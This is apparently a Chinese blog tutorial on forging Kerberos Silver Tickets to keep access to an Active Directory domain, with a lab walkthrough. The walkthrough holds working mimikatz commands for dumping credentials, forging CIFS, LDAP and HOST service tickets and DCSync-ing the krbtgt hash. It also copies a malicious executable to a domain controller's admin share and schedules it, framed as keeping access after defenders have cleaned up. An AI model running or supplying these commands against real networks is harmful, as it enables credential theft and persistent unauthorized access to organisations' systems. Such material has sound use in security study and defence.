🌟想系统化学习内网渗透?看看这个:[内网安全] 内网渗透 - 学习手册-CSDN博客
在前面的章节中,我们已经介绍了 “黄金票据”,本章我们将介绍 “白银票据”,白银票据与黄金票据的作用一致,都是后渗透阶段对域进行 “权限维持” 的一种手段,不同于 “黄金票据” 需要拿下域控,“白银票据” 的适用性更广,可以用来对域中普通的机器进行权限维持,也可以作为一种辅助手段对域控进行权限维持,这些在本章中都会讲到。
在讲解 “白银票据” 前,笔者先来介绍一下系统服务账号:
0x01:系统服务账号介绍
系统服务账号,是计算机加入域控后,域控自动为你分配的一个账号,通常以 计算机名$ 的形式出现,比如下图这样:
系统服务账号是计算机中用来管理服务的账号,笔者使用 D 盾进行排查,发现一个有意思的东西,似乎所有的域内用户都是写在了域控 AD 本地的注册表中(不然 D 盾咋查出来的):
还记得 Kerberos 认证的第三阶段吗,Client 会拿着 TGS 发放的 ST(Service Ticket)去服务端请求服务,我们后面介绍的 “白银票据”,就是伪造这个 “ST”:
伪造 ST 票据的一个难点就是 ST 是采用 Server 端密码加密的,这个 Server 端密码我们是不知道的,所以很难伪造。那么笔者这里不卖关子了,直接说了。这个 Server 端密码,其实就是我们前面介绍的系统服务账号的密码。 即 ST 的 Server 密码加密,其实就是系统服务账号密码的 NTLM Hash 加密。
0x02:Silver Ticket 白银票据原理
黄金票据的本质是伪造一个 TGT(理解为购票资格),拿到 TGT 了你就可以去 TGS(售票处)买通向任意服务的票了,相当于是域内管理员的身份;白银票据的本质是伪造一个 TS(指定地方的门票)拿着 TS 你只能去指定的地方,比如你买的动物园的票,你就不能去其他地方,相当于是本地管理员的身份。
在 Kerberos 认证的第三步中,Client 带着 ST 和自己的信息向 Server 上的某个服务进行请求,Server 接收到 Client 的请求后,通过自己的密码解密 ST,从而得到 ST 中的 CS_SK,然后利用 CS_SK 再解密用户数据,进而验证客户端的身份,如果验证成功,就让客户端访问 Server 上指定的服务。
在上面整个流程中,我们只要知道 Server 端密码的 Hash 就可以自己去伪造一个 ST,整个过程都不需要经过 KDC 的参与 。但因为 ST 只是访问目标指定的服务,所以每次伪造的白银票据只能访问目标指定的服务,不能向黄金票据那样,一次伪造,处处通用。
从原理不难看出,假设你发现攻击者有了白银票据,最好的防御方法就是修改本地计算机系统服务账号的密码。不过话又说回来了,你咋改,你找不到它,你咋改。(望大佬解答)
0x03:Silver Ticket 白银票据实战
0x0301:白银票据伪造前提
白银票据伪造是有前提的,主要有以下几个要求:
-
已经控制了域内机器并且拿到了本地管理员或提权的 System 权限。
-
知道域名称。
-
知道域的 SID 值。
-
知道可利用的服务。
-
知道服务账号的 NTLM Hash。
白银票据的利用,笔者在实战中发现,以普通域内用户和本地的 System 用户伪造的白银票据利用范围都不太一样,比如同样是伪造 CIFS(共享文件服务)的票据,普通域内用户只能查看目标的目录(不一定哈,在后面的实验中,笔者被自己打脸了,普通域内用户也可以复制),而 System 用户就可以进行复制,比较抽象,希望大家实战时自己总结一下。
0x0302:白银票据伪造实战 — 针对域控
实验环境
攻击机(Kali Linux):IP 172.16.0.103 — 安装了 Cobalt Strike 服务端 & 客户端
靶机(Windows Server 2012 — 域控):IP 172.16.0.110
靶机(Windows Server 2008 — 域内主机):IP 172.16.0.120
1. 控制域控和一台普通域内机器
如上,我们当前是拿到了域控的 Administrator 用户和一台域内主机的 System 用户和一个普通域内用户,满足了我们做 “白银票据” 的基本前提。
2. 获取白银票据构造信息
在域控中通过下面的命令可以拿到域的 SID 值与域名:
whoami /user # 获取域的 SID 值(去掉最后的 -500,500 是 RID 表示 “管理员” 用户)
net config workstation # 查看域名
最终我们收集到如下有效信息:
域名称: hack3rx.cn
域的 SID 值:S-1-5-21-3408615510-118924900-16812565983. 获取服务账号的 NTLM Hash 值
我们使用下面的命令,可以抓取到当前登录用户的密码和哈希值 和我们想要获取的系统服务账号的 NTLM Hash 值:
mimikatz sekurlsa::logonpasswords
最终得到的所有有效信息汇总如下:
域名称: hack3rx.cn
域的 SID 值:S-1-5-21-3408615510-118924900-1681256598
DC 的系统服务账号 NTLM Hash: 1256df22e7f5c2a0485298969a1ce38a4. 让域控下线,且清理后门
现在假设,目标系统管理员发现了你的攻击,已经将域控下线了,而且还清理了你留下的后门:
我们尝试直接用 PC-2008 这台机器使用下面的命令访问域控的 C 盘,不出所料,“拒绝访问”:
dir \\dc.hack3rx.cn\c$
5. 清理本机票据
但是因为之前我们已经记录了关键信息,所以我们现在就可以通过白银票据伪造针对特定服务的授权从而访问域控,不过在伪造票据前,我们得先清理本机已有的票据:
# 查票
mimikatz kerberos::tgt
shell klist
# 清票
mimikatz kerberos::purge
shell klist purge
6. 伪造 CIFS(共享服务)白银票据
使用下面的命令我们可以伪造 CIFS 服务的票据,拥有此票据,我们就能查看指定机器的目录:
mimikatz kerberos::golden /domain:<域名> /sid:<域 SID> /target:<主机名> /service:<伪造服务名> /rc4:<服务账号的 NTLM Hash> /user:<伪造的用户名,随意> /ptt
# 示例: mimikatz kerberos::golden /domain:hack3rx.cn /sid:S-1-5-21-3408615510-118924900-1681256598 /target:dc.hack3rx.cn /service:cifs /rc4:1256df22e7f5c2a0485298969a1ce38a /user:Whoami /ptt
注入成功后,我们再次尝试使用下面的命令访问域控的 C 盘,如下,成功访问:
dir \\dc.hack3rx.cn\c$
我们甚至还能使用下面的命令将本地的恶意程序直接复制到域控中:
copy c:\artifact.exe \\dc.hack3rx.cn\c$
7. 伪造 LDAP(共享服务)白银票据
仅仅是查看域控的 C 盘我们不满足,我们还想拿到域控中的 Krbtgt 账户的 NTLM Hash,进而拿到黄金票据,而要拿到 Krbtgt 用户的 Hash 我们得先构造 LDAP 的白银票据,使用下面的命令:
# 清理票据
shell klist purge # 伪造 LDAP 服务的白银票据,改 /service 字段就可以了
mimikatz kerberos::golden /domain:hack3rx.cn /sid:S-1-5-21-3408615510-118924900-1681256598 /target:dc.hack3rx.cn /service:LDAP /rc4:1256df22e7f5c2a0485298969a1ce38a /user:Whoami /ptt
成功注入 LDAP 服务的白银票据后,我们就可以使用下面的命令拿到域控中 Krbtgt 账户的 NTLM Hash 值,然后再构造黄金票据,呕吼,整个域内又可以开始纵横了:
mimikatz lsadump::dcsync /dc:<DC 主机名> /domain:<域名> /user:krbtgt# 示例:mimikatz lsadump::dcsync /dc:dc.hack3rx.cn /domain:hack3rx.cn /user:krbtgt
黄金票据参考资料:域权限维持 & 票据攻击 — Golden Ticket 黄金票据制作原理及利用方式
0x0303:白银票据伪造实战 — 针对域内主机
实验环境
攻击机(Kali Linux):IP 172.16.0.103 — 安装了 Cobalt Strike 服务端 & 客户端
靶机(Windows Server 2012 — 域控):IP 172.16.0.110
靶机(Windows Server 2008 — 域内主机):IP 172.16.0.120
靶机(Windows Server 2003 — 域内主机):IP 172.16.0.130
1. 控制两台域内主机
如上,我们当前是拿到了域内的两个机器,现在需要用 “白银票据” 做权限维持。
2. 获取白银票据构造信息
通过下面的命令,我们可以在 PC-2003 上收集到域的 SID 值与域名:
whoami /user # 获取域的 SID 值(去掉最后的 -500,500 是 RID 表示 “管理员” 用户)
net config workstation # 查看域名
最终我们收集到如下有效信息:
域名称: hack3rx.cn
域的 SID 值:S-1-5-21-3408615510-118924900-16812565983. 获取服务账号的 NTLM Hash 值
我们使用下面的命令,可以抓取到当前登录用户的密码和哈希值 和我们想要获取的系统服务账号的 NTLM Hash 值:
mimikatz sekurlsa::logonpasswords
最终得到的所有有效信息汇总如下:
域名称: hack3rx.cn
域的 SID 值:S-1-5-21-3408615510-118924900-1681256598
PC-2003 的系统服务账号 NTLM Hash: 06a8e9d2496f08cba175373e6b82437f4. 让被控主机下线,且清理后门
现在假设,PC-2003 的管理员发现了你的攻击,已经将你下线了,而且还清理了你留下的后门:
5. 清理本机票据
但是因为之前我们已经记录了关键信息,所以我们现在就可以通过白银票据伪造针对特定服务的授权从而访问 PC-2003,不过在伪造票据前,我们得先清理本机已有的票据:
# 查票
mimikatz kerberos::tgt
shell klist
# 清票
mimikatz kerberos::purge
shell klist purge
6. 伪造 CIFS(共享服务)白银票据
使用下面的命令我们可以伪造 CIFS 服务的票据,拥有此票据,我们就能查看指定机器的目录:
mimikatz kerberos::golden /domain:<域名> /sid:<域 SID> /target:<主机名> /service:<伪造服务名> /rc4:<服务账号的 NTLM Hash> /user:<伪造的用户名,随意> /ptt# 示例: mimikatz kerberos::golden /domain:hack3rx.cn /sid:S-1-5-21-3408615510-118924900-1681256598 /target:pc-2003.hack3rx.cn /service:cifs /rc4:06a8e9d2496f08cba175373e6b82437f /user:Whoami /ptt
注入成功后,我们尝试使用下面的命令访问 PC-2003 机器的 C 盘:
dir \\pc-2003.hack3rx.cn\c$
我们还能使用下面的命令将本地的恶意程序直接复制到 PC-2003 的 C 盘目录下:
copy c:\artifact.exe \\pc-2003.hack3rx.cn\c$
7. 埋坑:啥服务可以允许用户使用白银票据进行横向移动
这里笔者暂时没有能力进行下去了,笔者是想通过白银票据构造如计划任务的服务,为 PC-2003 机器远程设置定时任务,让他定时上线,笔者收集了写资料,说 HOST 服务有这个权限,但是笔者使用下面的命令伪造 HOST 票据后,并没权限远程为 PC-2003 设置定时服务,所以上线失败。
# 清空票据
shell klist purge# 创建 HOST 服务的白银票据
mimikatz kerberos::golden /domain:hack3rx.cn /sid:S-1-5-21-3408615510-118924900-1681256598 /target:pc-2003.hack3rx.cn /service:HOST /rc4:06a8e9d2496f08cba175373e6b82437f /user:Whoami /ptt# 尝试远程为 PC-2003 创建定时服务
schtasks /create /s pc-2003.hack3rx.cn /tn test /sc onstart /tr c:\artifact.exe /ru system /f继续学习吧,笔者后续会回来填坑的。
在前面的介绍中,我们通过 D 盾发现 PC-2003$ 以及域内用户其实都写在了域控的注册表中,笔者尝试了,只要我们能拿下域控,就可以通过下面的命令抓取任意一台机器的系统服务账号的 NTLM Hash:
mimikatz lsadump::dcsync /domain:<域名> /user:<用户名>
# 示例: mimikatz lsadump::dcsync /domain:<域名> /user:pc-2003$
然后,有了所有机器的系统账号的 NTLM Hash 后,我们后续就能随意利用白银票据进行横向移动了,当然,前提是把前面的坑填了。这也是为啥说,拿下了域控,就等于拿下了整个域了(话又说回来了,我有黄金票据,还费这劲构造白银票据干哈)。
Kerberos的白银票据详解 - 渗透测试中心 - 博客园0x01白银票据(Silver Tickets)定义 白银票据(Silver Tickets)是伪造Kerberos票证授予服务(TGS)的票也称为服务票据。如下图所示,与域控制器没有AS-REQ 和 AS-REP(步骤1和2),也没有TGS-REQ / TGS-REP(步骤3和4)通信。由于银票是
https://www.cnblogs.com/backlion/p/8119013.html
